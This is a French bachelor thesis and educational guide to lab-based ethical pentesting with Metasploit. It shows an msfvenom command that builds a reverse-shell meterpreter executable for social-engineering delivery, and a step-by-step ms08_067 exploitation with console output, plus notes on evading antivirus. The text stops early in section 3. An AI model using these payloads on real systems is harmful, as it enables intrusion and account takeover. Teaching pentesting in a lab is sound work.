

Haute école de gestion Genève

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit



Travail de Bachelor réalisé en vue de l'obtention du Bachelor HES

Par :

Ouail EL ALAMI

Conseiller au travail de Bachelor :

Jean-Luc Sarrade

Genève, le 29 septembre 2021

Haute École de Gestion de Genève (HEG-GE)

Filière Informatique de gestion



Déclaration

Ce travail de Bachelor est réalisé dans le cadre de l'examen final de la Haute école de gestion de Genève, en vue de l'obtention du titre Bachelor of Science HES-SO en Informatique de gestion.

L'étudiant a envoyé ce document par email à l'adresse remise par son conseiller au travail de Bachelor pour analyse par le logiciel de détection de plagiat URKUND, selon la procédure détaillée à l'URL suivante : <u>https://www.urkund.com</u>.

L'étudiant accepte, le cas échéant, la clause de confidentialité. L'utilisation des conclusions et recommandations formulées dans le travail de Bachelor, sans préjuger de leur valeur, n'engage ni la responsabilité de l'auteur ni celle du conseiller au travail de Bachelor, du juré et de la HEG.

« J'atteste avoir réalisé seul le présent travail, sans avoir utilisé des sources autres que celles citées dans la bibliographie. »

Fait à Genève, le 29 septembre 2021

Ouail EL ALAMI

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Remerciements

Je voudrai en premier temps remercier Monsieur Jean-Luc Sarrade, professeur de réseau à la HEG, qui m'a suivi tout le long de mon travail de Bachelor en me guidant sur la bonne voie depuis le début de la rédaction, ainsi que pour sa patience, sa disponibilité et ses précieux conseils, qui ont contribué à alimenter ma réflexion.

Je remercie également toutes les personnes qui ont pris le temps de relire mon rapport en m'aidant à corriger les erreurs et en m'indiquant les passages peu clairs pour améliorer la compréhension de mon guide.

Finalement, je remercie la Haute École de Gestion, les professeurs et les assistants, qui durant mon cursus, m'ont beaucoup appris, ce qui m'a aidé à la réalisation de ce mémoire, mais aussi pour la suite de ma carrière professionnelle.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Résumé

Le pentesting peut sembler facile et amusant à vue d'œil, aussi le fait que les outils de pénétration soient à disposition pour toute personne qui s'y intéresse peut donner l'impression que c'est à porter de tout le monde. La vérité, c'est que c'est tout le contraire.

Avoir un laboratoire de test comme celui que nous avons créé pour ce rapport (Kali linux et les machines virtuelles qui représentent les victimes d'attaques) requiert beaucoup de préparation, de curiosité et de responsabilité. Car une fois les outils mis en place, cela peut s'avérer dangereux pour l'utilisateur si ce n'est pas dans un cadre éthique, ce qui en ferait une action illégale. Ainsi, il est nécessaire de mettre la sécurité de tous en priorité.

Les attaques présentées dans ce rapport nous montrent à quel point nous pouvons être vulnérables si nous ne nous protégeons pas correctement et sans se renseigner sur les machines utilisées et être à jour sur les nouvelles en informatique. Celles-ci nous apprennent non seulement leurs fonctionnements dans un cadre d'apprentissage, mais également comment les éviter en nous mettant dans la peau d'un hacker malveillant.

Nous avons aussi appris que ce sujet est très vaste et versatile, il ne suffit pas de suivre un tutoriel pour devenir un bon connaisseur de ce thème. Par exemple, il est nécessaire de s'intéresser à plusieurs sujets concernant une attaque ainsi que de s'informer au maximum sur les outils utilisés. En effet, les tutoriels fonctionnels à un moment donné ne signifient pas qu'ils le seront toujours et de la même manière. Peut-être qu'ils resteront pertinents en utilisant une technique différente, au vu des avancées technologiques. Dans la plupart des cas, les attaques que j'ai documentées dans ce travail de bachelor, deviennent obsolètes à cause de la sécurité des machines qui se renforce.

Il faut également garder en tête que le pentesting requiert beaucoup de patience, surtout de la part des personnes qui veulent entrer dans ce monde du hacking éthique. Pour ma part, lire des livres expliquant ce sujet en profondeur pour les débutants était un grand plus donc je le recommande. Apprendre des expériences des autres peut nous faire gagner du temps, par exemple grâce à ce guide, vous allez apprendre en quelques heures seulement ce que j'ai appris en deux mois.

Pour finir, après avoir maîtrisé les attaques ci-dessous, vous rentrez dans un monde où le flux du savoir ne s'arrête jamais. Être curieux pour en apprendre davantage, reste la qualité la plus importante pour aller plus loin dans ce domaine. Il ne faut pas oublier :

« Un grand pouvoir implique de grandes responsabilités ».

Ben PARKER, Spider-Man

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Table des matières

Déclaration	1
Remerciements	2
Résumé	3
Liste des figures	6
1. Introduction	1
1.1 Contexte	1
1.2 Outils nécessaires	2
2. MetaSploit :	3
2.1. Introduction :	3
2.2. Architecture :	4
2.3. Armitage :	8
2.4. Choix des exploits : 1	0
3. Exploit smb/ms08_067_netapi :1	2
3.1. Préparations : 1	2
3.2. Payload windows/meterpreter/reverse_tcp1	3
3.3. Payload payload/windows/adduser :1	5
4. Exploit browser/ie_execcommand_uaf:1	7
4.1. Préparation : 1	7
4.2. Payload windows/meterpreter/reverse_tcp :1	7
5. Auxiliaire server/browser_autopwn2 :	0
5.1. Préparation :	0
6. Auxiliary dos/tcp/synflood (windows):2	4
6.1. Préparation : 2	4
6.2. Attaque :	5
7. Exploit vsftpd_234_backdoor (linux) :2	7

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

7.1. Préparation :
7.2. Payload cmd/unix/interact :
8. Exploit samba/usermap_script :
8.1. Préparation :
8.2. Payload cmd/unix/generic :
9. Auxiliary admin/smb/samba_symlink_traversal :
9.1. Préparation :
9.2. Attaque :
10. Exploit multi/misc/java_rmi_server :
10.1. Préparation :
10.2. Payload java/meterpreter/reverse_tcp :
11. Outils post-exploitation :
11.1. Windows/meterpreter/reverse_tcp :
11.2. Post/windows/capture/keylog_recorder :
11.3. Pivot :
<i>12. Mesures à prendre : 47</i>
Conclusion

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Liste des figures

- Figure 1 : architecture librairies Metasploit
- Figure 2 : /usr/share/metasploit-framework
- Figure 3 : /usr/share/metasploit-framework/modules
- Figure 4 : armitage
- Figure 5 : Récupération IP adresse Windows XP SP3
- Figure 6 : Chercher et sélectionner l'Exploit
- Figure 7 : Paramètres de l'Exploit
- Figure 8 : Configurer un paramètre et exécuter l'Exploit
- Figure 9: options payload windows/adduser
- Figure 10 utilisateurs machine victime
- Figure11 : version utilisée de IE
- Figure 12 : paramètre de l'Exploit ie_execcommand_uaf
- Figure 13 : Exécution du lien sur Internet Explorer
- Figure 14 : session Meterpreter de l'Exploit ie_execcommand_uaf lancée
- Figure 15 : options browser_autopwn2
- Figure 16 : lancement du module browser_autopwn2
- Figure 17 : browser_autopwn2 a détecté une potentielle cible
- Figure 18 : session meterpreter réussie grâce à browser_autopwn
- Figure 19 : Nmap synflood
- Figure 20 : État de la machine Windows avant l'attaque
- Figure 21 : Paquets provenant de l'attaquant
- Figure 22 : État de la machine Windows après l'attaque
- Figure 23 : exploitation vsftpd

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 24 : Nmap Samba

- Figure 25 : set CMD shutdown 0
- Figure 26 : erreur de connexion smbclient
- Figure 27 : exécution de la commande smbclient
- Figure 28 : Les paramètres du module samba_symlink_traversal
- Figure 29 : Exécution du module samba symlink traversal
- Figure 30 : Récupération des mots de passe avec smb
- Figure 31 : Paramètres et exécution du scanner misc/java_rmi_server
- Figure 32 : Configuration de l'exploit java_rmi_server
- Figure 33 : Migrate Meterpreter
- Figure 34 : Changer le UID
- Figure 35 : ancien hashdump
- Figure 36 : Commandes kiwi et récupération de mots de passe
- Figure 37 : Changement d'user ID
- Figure 38 : Keylogger sur Windows XP
- Figure 39 : screen share machine windows
- Figure 40 : Utilisation du keylog_recorder et l'output du résultat
- Figure 41 : adresses des machines cibles
- Figure 42 : tests ping sur machines victimes
- Figure 43 : attaque première machine
- Figure 44 : attaque deuxième machine
- Figure 45 : sessions meterpreter ouvertes
- Figure 1.1 : Scan réseau avec Nmap
- Figure 1.2 : Scan de ports d'une machine Metasploitable2

Figure 1.3 : Scan de ports de Metasploitable2 Nmap -T4 -A -v (IP de la cible)

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

1. Introduction

1.1 Contexte

Nous vivons dans une ère où l'informatique évolue de manière exponentielle, surtout durant la période de la pandémie du COVID-19, qui nous oblige à trouver des solutions pour continuer à faire tourner notre économie sans prendre de risque de contamination. Parmi celles-ci, le télétravail est le plus courant.

Qui dit télétravail, dit ordinateur et internet, que nous utilisons pour faire des réunions, échanger des informations et des données, etc.

La majorité, voire la totalité des entreprises, comme les banques, les services d'État tel que la police, ont informatisé leur système d'information pour s'adapter à la nouvelle ère, faciliter ainsi la gestion de leur activité et améliorer la sécurité des accès aux données et dossiers classifiés. Toutefois, la numérisation couvre seulement une partie du vol physique. En effet, cette évolution a ouvert une porte à de nouvelles menaces, qui peuvent engendrer de lourdes conséquences chez la victime de l'attaque : les cyberattaques.

Grâce à ce travail de bachelor, nous allons traiter un petit bout de partie visible de l'iceberg que l'on surnomme « pentesting » ou, en français, test d'intrusion.

Cette méthode consiste à analyser les infrastructures informatiques dans le but de trouver des failles et de les exploiter simulant ainsi les actions d'un hacker mal intentionné. Cela permet de comprendre ce qui est possible et de faire un rapport pour que la victime en question puisse se rendre compte de sa vulnérabilité et se protéger.

Ce qui différencie cette méthode avec un audit de sécurité est que le pentesteur est motivé à exploiter au maximum les failles, donc métaphoriquement ouvrir complètement la porte qu'il a trouvé entrouverte et y pénétrer pour se servir de tout ce qui s'y trouve, alors qu'un audit se contente de signaler une porte semi-ouverte.

Nous nous concentrons dans ce travail sur un seul framework : MetaSploit, qui est un projet open source et un outil d'exploitation de vulnérabilité très utilisée par les pentesteurs ainsi que par les hackers malveillants.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

1.2 Outils nécessaires

« Si j'avais 8 heures pour couper un arbre, je passerais 6 heures à aiguiser la lame. » (Abraham Lincoln)

Kali linux :

C'est une distribution GNU/Linux basée sur Debian qui regroupe plusieurs outils nécessaires aux tests de sécurité d'un système informatique. Cette distribution a pris la succession de BackTrack qui était basée sur Ubuntu, consacrée à l'inforensique et qui contenait donc essentiellement des outils pour tester la sécurité d'un réseau.

Kali est le couteau suisse d'un professionnel de la sécurité informatique, et dans le cadre de ce guide, nous n'allons utiliser qu'un seul de ses outils.

Windows :

C'est un système d'exploitation multitâche, dont la version que nous utiliserons n'est plus supportée depuis 2016. Il sera utilisé dans la machine virtuelle « victime ».

La version SP3 étant la dernière version contenant plusieurs failles, ce sera la version de notre machine « victime ».

Metasploitable 2 :

C'est une machine virtuelle Ubuntu Linux intentionnellement vulnérable créée dans le but de tester les vulnérabilités courantes avec des tests d'intrusions.

VMware Workstation :

C'est un logiciel qui permet de créer plusieurs machines virtuelles dans le même système d'exploitation. La possibilité que celles-ci puissent être reliées au réseau local avec une adresse IP différente nous permet d'installer la machine Windows (victime) ainsi que la machine Kali (attaquant) sur le même ordinateur et de virtualiser deux machines différentes pour simuler les attaques.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

2. MetaSploit :

2.1. Introduction :

Comprendre cet outil avant de se lancer sur son utilisation est primordial. C'est pour cela que ce guide commence par une présentation des aspects nécessaires à connaître avant de commencer les simulations d'attaques.

En quelques mots, MetaSploit est un outil très puissant de test d'intrusion open source, qui a pour objectif de fournir des informations sur les vulnérabilités et les failles des systèmes informatiques. Cet instrument est une arme à double tranchant : il peut être utilisé pour identifier de potentielles sources de faiblesse, ou pour des activités illégales.

En utilisant cet outil pour exploiter un système, il faut suivre les étapes suivantes :

- Choisir et configurer un Exploit¹
- Vérifier que le système cible est bien sensible à l'Exploit choisi
- Choisir et configurer un payload²
- Choisir la technique d'encodage pour encoder le payload de sorte que les systèmes de prévention d'intrusion ne le détectent pas
- Exécuter l'Exploit

Nous allons présenter ces étapes en détail par la suite, dans les cas pratiques des attaques.

Un des avantages de ce framework est qu'il nous permet de combiner n'importe quel Exploit avec n'importe quel payload et donc de faciliter la tâche des développeurs et de l'attaquant.

Afin de bien choisir les deux options ci-dessus, il est nécessaire d'avoir quelques informations sur le système cible, comme la version de son OS et les services réseau

¹ Code permettant de pénétrer un système en profitant de l'une de ses failles

² Code qui s'exécutera après s'être introduit dans la machine cible

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

installés. Ces données peuvent être récupérées grâce à d'autres outils, comme Nmap et Nessus que nous pouvons trouver dans le système Kali.

2.2. Architecture :

Metasploit comporte plusieurs composants, dont des librairies, des modules, des plugins et des outils. Voici un schéma visuel de cette structure.





REX : s'occupe majoritairement des fonctions du Core comme préparer les « Sockets », les connexions, les formatages et plein d'autres fonctions.

MSF CORE : fournis la partie API ainsi que le noyau principal du framework.

MSF BASE : fournis une API pour soutenir les modules.

Afin de mieux visualiser ce qui suivra, nous allons détailler la partie « penetration modules », c'est-à-dire l'organisation des dossiers et des fichiers de ce framework.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit



Figure 2 : /usr/share/metasploit-framework

Data : contiens des fichiers utilisés par MetaSploit pour stocker les binaires nécessaires pour certains exploits.

Documentation : contiens la documentation sur le framework.

Lib : contiens le code de base du framework (par exemple « SNMP »)

Plugins : contiens les plugins de MetaSploit tels que « sqlmap » par exemple.

Scripts : contiens des scripts comme le Shell ou meterpreter³.

Tools : contiens différents outils de ligne de commande comme « Exploit »

³ Payload d'attaque qui fournit un Shell interactif qui permet à le hacker d'explorer la machine cible et exécuter du code. Il est déployé dans la mémoire avec une injection DLL.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit



Figure 3 : /usr/share/metasploit-framework/modules

Modules : toutes les interactions avec MetaSploit Framework se feront à travers plusieurs modules qui se trouvent dans le dossier à l'adresse /usr/share/metasploit-framework/modules.

Les modules sont organisés dans différents répertoires selon leurs fonctionnalités:

- Exploits : ce sont des scripts, des programmes modulables, nécessitant l'utilisation de payloads tel que meterpreter, qui est celui par défaut. Ces programmes exploitent une séquence de commandes qui visent une vulnérabilité spécifique dans un système résultant donc en un accès accordé à l'attaquant pour la machine cible. Ces derniers sont divisés par catégories. Nous trouvons « Android », « IOS », « Windows ». par exemple : « Linux », etc. Dans la catégorie de Windows, nous allons prendre par exemple l'Exploit « ms08 067 netapi ». Cette attaque se base sur une vulnérabilité d'exécution de code à distance sur les systèmes basés sur Microsoft Windows 2000, Windows XP, et Windows Server 2003. En exploitant cette faille, il sera possible de prendre le contrôle complet d'un système affecté à distance via RPC⁴ sans avoir besoin de s'authentifier. D'après le support de Microsoft, le responsable de cette vulnérabilité est le service Server qui gère mal les requêtes RPC spécialement concues. Nous allons l'utiliser dans un exemple d'attaque plus tard.
- Auxiliary : modules pour les actions auxiliaires tels que les scanners de ports, les sniffers, le login brute force, le cracking et d'autres. Il y a aussi des scripts, mais contrairement aux Exploits, les modules Auxiliary n'ont pas nécessairement besoin de payloads. Nous prenons comme exemple la récupération des informations sur le SSH d'une cible, pour cela il faut chercher « *ssh_version »*, et

⁴ (Remote procedure call) est un protocole réseau qui permet de faire des appels de procédures sur un ordinateur à distance grâce à un serveur d'applications.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

choisir le *auxiliary/scanner/ssh/ssh_version,* qui n'est donc pas un Exploit, mais un scanner dans les auxiliaires. Pour finir, puisque ce n'est pas une exploitation, il faut la lancer avec la commande *run* pour avoir les informations que l'on recherche (ne pas oublier de mettre les *threads* à 100).

- Payloads : modules qui seront exécutés durant l'exploitation, comme pour établir une session meterpreter, reverse Shell, exécuter une commande à distance, etc. Il existe deux types de payloads qui seront utilisés selon les scénarios auxquels les attaquants peuvent être confrontés :
 - Staged : ce type de payloads est généralement envoyé sur la machine de la victime en deux parties : la première partie (stage 0) crée une connexion entre la machine de l'attaquant et la machine de la victime ; la deuxième partie (stage 1) contient l'Exploit qui sera envoyé à travers la connexion créée. exécuté chez la victime. puis On peut créer des staged payloads avec la commande msfpc. Le payload « staged » classique de MetaSploit est : windows/meterpreter/reverse_tcp
 - Stageless : l'équivalent du staged payload ci-dessus est : windows/meterpreter_reverse_tcp
 Aussi appelé « Single », on remarque que celui-ci sépare le meterpreter et le reverse avec '__ ' et non pas '/' comme l'exemple du staged payload. Ce type de payload est envoyé en entier sur la machine de la victime et contient tout ce qui est nécessaire pour obtenir ce que l'attaquant cherche (exemple du reverse Shell sur la machine de le hacker). Cette catégorie peut être utile dans une situation où la victime se trouve derrière un proxy qui bloque le téléchargement des fichiers exécutables ou bien dans le cas où elle n'a simplement pas accès à internet.
- Encoders : ce sont des modules pour le codage et le cryptage tels que base64, XOR, shikata-ga-nai, etc. Ils s'assurent que les payloads arrivent à destination et échappent aux défenses mises en place, par exemple des antivirus ou NIDS (Network Intrusion Detection Systems), EDR (Endpoint Detection and Response), etc.
- Evasion : modules pour éviter les défenses, comme les Antivirus, AppLocker bypass, SRP (Software Restriction Policies), etc.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

- Nops : maintiens les tailles des payloads durant les tentatives d'Exploit, en générant des instructions No Operation (code) inoffensives à des fins de remplissage, de glissement en mémoire pendant l'exploitation, etc.
- **Post :** modules pour les actions post-exploitation comme l'installation d'un Backdoor, proxying, keylogging, screen capturing et d'autres.

2.3. Armitage :

C'est une GUI⁵ basée sur le langage JAVA, créé par Raphael Mudge, dans le but de démontrer toute la puissance de Metasploit d'une manière visuelle et intuitive. Voici une représentation de cette interface.



Figure 4 : armitage

J'ai lancé la commande *armitage* dans un terminal pour avoir l'interface graphique derrière. À gauche, nous avons la liste des modules regroupés par type, ce qui est très pratique quand nous ne connaissons pas le nom des attaques.

⁵ Graphical user interface

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

En double cliquant sur l'attaque souhaitée, un menu s'affiche avec les paramètres que l'on souhaite modifier selon notre besoin. Ainsi qu'un bouton pour exécuter l'attaque dans la partie inférieure de l'image où nous trouvons le résultat de l'attaque lancée sous forme de lignes de commandes interactives.

2.4. Msfvenom :

MSFvenom est une combinaison entre Msfpayload et Msfencode, ce qui nous permet d'utiliser ces deux outils en un seul framework grâce à la commande *msfvenom*.

La première partie de cet outil permet de générer des payloads personnalisés, et la deuxième partie s'occupe de camoufler ce payload pour traverser les agents de sécurité présents dans les machines comme les antivirus.

Une des principales utilisations de MSFvenom est : la création d'un fichier exécutable qui permet au hacker de pénétrer une machine qui présente peu de failles. Cela en comptant sur les techniques de social engineering, pour que la victime exécute son code depuis la machine cible en lui accordant donc l'accès.

Voici un cas d'utilisation et un exemple de code :

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.25 LPORT=4444 -f exe -o /home/kali/Bureau/executableWin10.exe

Cette ligne de commande permet de créer un fichier sur le bureau intitulé *executableWin10.exe,* qui contient le payload *windows/meterpreter/reverse_tcp,* en modifiant les paramètres *LHOST et LPORT* avec les valeurs indiquées ci-dessus.

Ensuite, il est nécessaire de préparer un exploit sur *msfconsole* dans l'attente de l'exécution du fichier de la part de la victime, principalement cet exploit sera *exploit/multi/handler* en lui indiquant la même valeur de *LHOST*.

Finalement, au moment où l'utilisateur cible appuie sur le fichier, une session meterpreter devrait se lancer chez l'attaquant lui accordons ainsi le contrôle de l'ordinateur de la victime.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

2.5. Choix des exploits :

2.5.1. Ms08_067_netapi (Windows) :

Cet Exploit a été choisi comme premier Exploit, car c'est celui qui est le plus documenté sur internet concernant Windows XP SP3 : plus la faille est documentée plus son explication sera complète et compréhensible.

La facilité d'exploitation de cette faille nous permet de mieux nous concentrer sur les actions post exploits, comme par exemple un keylogger.

2.5.2. Browser/ie_execcommand_uaf (Windows) :

J'ai choisi cette faille, car elle implique un nouveau concept (UAF), qui sera mieux expliqué dans la section de l'attaque, mais aussi, car elle implique l'utilisateur de la machine victime. En effet, les pénétrations directes des systèmes diminuent en raison des mises à jour fréquentes qui éliminent de plus en plus de failles. Les attaquants se retrouvent alors dans une position où ils doivent passer par du social engineering pour tromper l'utilisateur afin que celui-ci leur ouvre la porte pour entrer.

En l'occurrence cette attaque profite d'une faille dans une application (IE) ainsi que de la non-formation des utilisateurs pour les inciter à cliquer sur un lien externe.

2.5.3. Browser_autopwn (Windows) :

Ce module est un auxiliaire particulier que j'ai décidé de rajouter, car il est simple à exécuter et ne nécessite pas énormément de connaissances préalables. Cependant il est conseillé d'avoir une connaissance de base suffisante pour comprendre ce que Metasploit nous indique. Cette une attaque tourne en arrière-plan et ne prend pas beaucoup de temps à être mise en place.

2.5.4. Synflood (Windows) :

Cet auxiliaire nous permet de lancer une attaque qui prend plus de temps que les autres pour avoir un impact sur le système ciblé (qui peut être Windows ou Unix). Elle peut même être utilisée pour leurrer la machine cible, grâce à un paramètre *SHOST* qui permet de tromper cette dernière en lui faisant croire que les paquets arrivent d'une autre adresse que celle de l'attaquant.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

2.5.5. Sftpd_234_backdoor (Unix) :

Même si la faille le concernant n'a été présente que quelques jours, elle a été très facilement exploitable. Ceci dû à une vulnérabilité dans le fichier vsftpd qui donnait accès à l'attaquant à travers une backdoor.

Le simple fait que cette faille crée un accès secret vis-à-vis de la victime montre la dangerosité de laisser les ports sans surveillance et la facilité pour un hacker de pénétrer dans une machine vulnérable avec les bons outils.

Le seul désavantage à cet Exploit est qu'il propose un seul payload : *Payload cmd/unix/interact.*

2.5.6. Samba/usermap_script (Unix) :

Cet exploit est assez intéressant : même si la procédure de l'exploitation ressemble à celle qui précède, il nous offre plus de choix de payloads et constitue donc un meilleur outil d'entraînement.

La possibilité d'exécuter du code à distance fait de cet exemple un nouveau type de payload à rajouter dans notre bibliothèque du savoir.

En outre, la vulnérabilité que nous trouvons dans Samba version 3.0.20 a un taux de présence plus élevé que celui du Vsftpd version 2.3.4.

2.5.7. Java_rmi_server (Unix) :

Ce qui m'a poussé à choisir cet Exploit est qu'il a été mentionné par plusieurs sites de pentesting comme un bon exercice pour les débutants, d'autant plus qu'il nous fournit une session de Meterpreter sur une machine Linux.

2.5.8. Samba_symlink_traversal (Unix) :

J'ai choisi ce module, car c'est un auxiliaire, ce qui change des exploits cités au préalable. De plus, il n'est pas nécessaire d'avoir de payload pour l'exploitation. En occurrence, nous utilisons un autre moyen, le service smbclient. Il rend cette attaque unique et permet de s'entrainer à passer par des dossiers partagés et non par une console à distance.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

3. Exploit smb/ms08_067_netapi :

3.1. Préparations :

Cette faille est un bug d'exécution de code à distance qui permet par exemple d'exécuter psexec (un outil de PSTools qui permet le lancement de CMD interactive sur des systèmes à distance) sans authentification.

Pour cet exercice, nous allons lancer la machine virtuelle Windows XP SP3 et récupérer son adresse IP soit avec un Nmap depuis la machine Kali Linux, soit directement sur la machine cible en exécutant la commande *ipconfig* dans l'invite de commandes (CMD).

Figure 5 : Récupération IP adresse Windows XP SP3



Maintenant que nous connaissons son adresse, nous allons nous mettre sur la machine qui simule l'attaquant (Kali), et lancer le framework console de MetaSploit avec la commande *msfconsole* qui produit une belle page d'accueil avec des informations telles que la version, le nombre d'exploits, etc.

Pour le bon fonctionnement de Metasploit, il est recommandé de lancer la base de données avec la commande *service postgresql start*.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

3.2. Payload windows/meterpreter/reverse_tcp

. ouail@KALI-portable: ~ _ 🗆 x Q : msf6 > search 08-067 Matching Modules _____ Name Disclosure Date Rank Check Description # 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_ 067_netapi msf6 > use exploit/windows/smb/ms08_067_netapi [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp <u>msf6</u> exploit() >

Figure 6 : Chercher et sélectionner l'Exploit

La commande *search* nous permet de chercher les exploits ou les payloads et de les mettre dans une liste comme ci-dessus. Les éléments de la liste comprennent un # qui sera l'ID de la ligne pour cette recherche, puis une date de divulgation de la faille suivie d'une note de fiabilité dans l'ordre du plus faible au plus sûr (Low, average, normal, good, great et excellent). Ensuite la colonne « Check » indique si la cible est bel et bien vulnérable à cet Exploit en particulier. Cette colonne est optionnelle : pas tous les exploits la prennent en charge.

Ensuite, pour sélectionner l'Exploit souhaité il suffit d'exécuter la commande *use* suivie soit du chiffre de la colonne « *#* », donc *use 0*, soit du nom du module xxx/xxx comme illustré sur la figure 6.

Par la suite, on peut remarquer que la ligne a été sélectionnée et mise en évidence (en rouge), car le framework a compris que c'était un exploit.

Pour cet Exploit le payload utilisé sera celui par défaut, comme l'avant-dernière ligne l'indique (*windows/meterpreter/reverse_tcp*).

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

			ouail@KALI-portable:~ Q 🚼 _ 🗆 🗙
<u>isf6</u> exploi	t(windows/smb/ms0)) > show options
lodule opti	ons (exploit/wind	ows/smb/ms	08_067_netapi):
Name	Current Setting	Required	Description
RHOSTS		yes	The target host(s), range CIDR identifier, or hosts file w
RPORT	445 PROWEER	yes	The since parts (TCP)
SMOPIPE	DROWSER	yes	The pipe name to use (browser, skysyc)
Payload opt	ions (windows/met)	erpreter/re	everse_tcp):
Payload opt Name	ions (windows/met) Current Setting	erpreter/re Required	everse_tcp): Description
Payload opt Name EXITFUNC LHOST LPORT	ions (windows/meto Current Setting thread 192.168.1.26 4444	erpreter/re Required yes yes yes yes	everse_tcp): Description Exit technique (Accepted: '', seh, thread, process, none) The listen address (an interface may be specified) The listen port
Payload opt Name EXITFUNC LHOST LPORT	ions (windows/meto Current Setting thread 192.168.1.26 4444 get:	erpreter/ro Required yes yes yes yes	everse_tcp): Description Exit technique (Accepted: '', seh, thread, process, none) The listen address (an interface may be specified) The listen port
Payload opt Name EXITFUNC LHOST LPORT Xploit tar Id Name	ions (windows/meta Current Setting 	erpreter/re Required yes yes yes yes	everse_tcp): Description Exit technique (Accepted: '', seh, thread, process, none) The listen address (an interface may be specified) The listen port
Payload opt Name EXITFUNC LHOST LPORT Exploit tar Id Name	ions (windows/meta Current Setting 	erpreter/re Required yes yes yes yes	everse_tcp): Description Exit technique (Accepted: '', seh, thread, process, none) The listen address (an interface may be specified) The listen port

Après avoir sélectionné le module, nous pouvons afficher les options du payload et de l'Exploit avec *show options*. Dans cet exemple, le payload n'a pas besoin d'être rempli ni modifié, mais nous remarquons qu'une option du module n'est pas définie alors qu'elle est requise (colonne « Required » a comme valeur « yes ») : ce paramètre manquant est l'adresse IP de la cible, comme l'indique la description.

Figure 8 : Configurer un paramètre et exécuter l'Exploit

	ouail@KALI-portable: ~	Q 🗄 _ 🗆 X
<u>msf6</u> exploit(windows/smb/ms08_ RHOSTS => 192.168.1.30 <u>msf6</u> exploit(windows/smb/ms08_	007_netapi) > set RHOSTS 192.168.1.30 007_netapi) > exploit	
 Started reverse TCP handle 192.168.1.30:445 - Automat 192.168.1.30:445 - Fingerp 192.168.1.30:445 - Selecte 192.168.1.30:445 - Attempt Sending stage (175174 byte Meterpreter session 1 open 200 	r on 192.168.1.26:4444 ically detecting the target rint: Windows XP - Service Pack 3 - lang:f d Target: Windows XP SP3 French (NX) ing to trigger the vulnerability s) to 192.168.1.30 ed (192.168.1.26:4444 -> 192.168.1.30:1039	French 9) at 2021-08-06 14:30:43 +0
<pre>meterpreter > ls Listing: C:\WINDOWS\system32 ====================================</pre>		

Pour remplir ou modifier un paramètre, il faut utiliser la commande *set (paramètre)* (*valeur*), pour cette attaque nous avons exécuté *set RHOSTS 192.168.1.30*. La ligne d'en dessous indique que le paramètre a bien été modifié.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Ensuite nous exploitons la faille avec la commande *exploit*, qui consiste à lancer un reverse TCP. Cette technique est utilisée pour que l'attaquant fasse en sorte que ce soit l'hôte qui initie la connexion vers lui, car les firewalls bloquent les connexions entrantes. Il s'agit d'un moyen de contourner cette défense.

Plusieurs étapes se suivent durant l'attaque et aboutissent à la création d'une session Meterpreter qui fournit un Shell interactif sous *meterpreter* > sur le processus *svchost.exe* avec un processus ID de 1148. La commande *migrate* du Meterpreter reste utilisable à cette étape.

J'ai ensuite exécuté la commande *ls* qui indique dans quel répertoire je me trouve, ce qui confirme que l'attaque a fonctionné puisqu'actuellement nous nous retrouvons dans le *c:\WINDOWS\system32*. Pour vérifier que je me trouvais sur la bonne machine, j'ai parcouru les dossiers pour aller sur le répertoire *bureau*, puis j'ai exécuté *mkdir test*, ce qui a créé un dossier « test » dans la machine victime.

Notons qu'avec les encoders par défaut, cette attaque ne marcherait pas sur une machine qui a un firewall activé. Dans cet exemple, la machine a été volontairement exposée en désactivant son firewall.

3.3. Payload payload/windows/adduser :

Pour cela, un changement de payload est nécessaire avec la commande *set PAYLOAD payload/windows/adduser,* en restant sur le même Exploit.

Ce payload permet de créer un utilisateur en configurant les *options* telles que le mot de passe, le nom d'utilisateur et le groupe à qui il appartient comme dans la figure cidessous. Après avoir rempli les paramètres, nous exécutons l'Exploit avec ce payload *exploit.* La dernière ligne de la console indique que l'Exploit a bien été complété et que l'utilisateur a été créé. En allant sur la machine victime, on trouve bel et bien le compte créé (figure « utilisateurs machine victime »).

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 9: options payload windows/adduser :

		ouail@KALI-portable: ~	۹ :] -	x
<u>msf6</u> exploit(windows/smb/ms0		pi) > search payload/windows/add			
Matching Modules					
